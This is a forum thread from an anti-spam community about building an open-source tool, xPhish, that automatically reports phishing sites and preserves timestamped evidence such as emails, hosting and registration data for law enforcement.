InBoxRevenge KS Forum

taking pieces of code from xComplaint, I'm writing an automated tool for phishing reporting.
Automatically discern if a web site is cracked or is a phish domain (just registered), recover host or registrar and so on.
My idea is also to keep track of all received links, and periodically check if are suspended.

First version will be a bash script, next will be a compiled C, last a C with GUI.

Definitely keep us updated. I have a gaggle of people who would use this on a daily basis.

SiL

Nice, just caught this post, efa. Thank you for your contribution. I look forward to seeing it later.

I don't know how complex the programming would be, but a program that would save a timestamped copy of the data would help replace what Castlecops's PIRT was doing, as far as saving data for law enforcement.

are you speaking about saving the phish email or saving the phish web site?

Saving anything that would be useful in court if someone gets arrested -- documenting the email with headers to show he violated the law using someone else's computer to mail it and that there were false statements in the message, document the hosting and registration information, document the content of the sites -- if you can do all of it, you're recreating PIRT, which a lot of people would like to see happen. The question is where to store the data, how much you can store, how to do it so it can't be altered without a time stamp for legal purposes, and how to get law enforcement to take notice. Even doing part of it would be useful.

There are lots of agencies with spamtraps working with law enforcement, saving the raw spams with headers. So if we can't do everything, saving the spam is not critical. It would be useful having documentation of the registration information, nameserver information, the IP's where each was hosted, maybe some sampling of the changing IP's for fast flux, etc. Our own stored sent Complainterator reports are informal documentation, but again, they aren't as valid for legal purposes since they can be altered without it being apparent what's been done or when or by whom.

saving phish/spam email is already done by xComplaint in "forwarded.txt" local file, so it is easy.
Saving web pages is little difficult, but xComplaint from last version download the web pages to look for redirection link, and so it is not so difficult to save also these data.
As now I use 'wget' to download web pages as xComplaint is a CLI application, but with the GUI version I can use WebKit
http://en.wikipedia.org/wiki/WebKit
that seems faster then Gecko (Mozilla engine).

The difficulties come from recovering all other informations, space to save all the web sites, and a form of protection against alterations (I can't imagine a valid one)

I do not know the story behind PIRT and Castlecops (I'm interested in), but I know that the only software that survive to time is opensource.
Imagine an author, lot of work to write an application, keeping it closed source. Time passes, interest changes. The author become not interested in further developing or simply miss time. All the good work is lost. I remember tens of applications disappeared so. And many others released as opensource as they can survive.
GPL software can be further developed from other people. Imagine a collaborative work, we can reach objectives that one men alone can't.
This is the trick behind GNU and Linux, collaborative work, shared intelligence and opensource. They often arrive later, but do it better and forever.

I developed a piece of code to decode any escape sequences inside javascript embedded in html pages attached to emails. This is a recent technique used by phisher to hidded POST link. Will become part of xPhish. As now xPhish will be packaged with next version of xComplaint.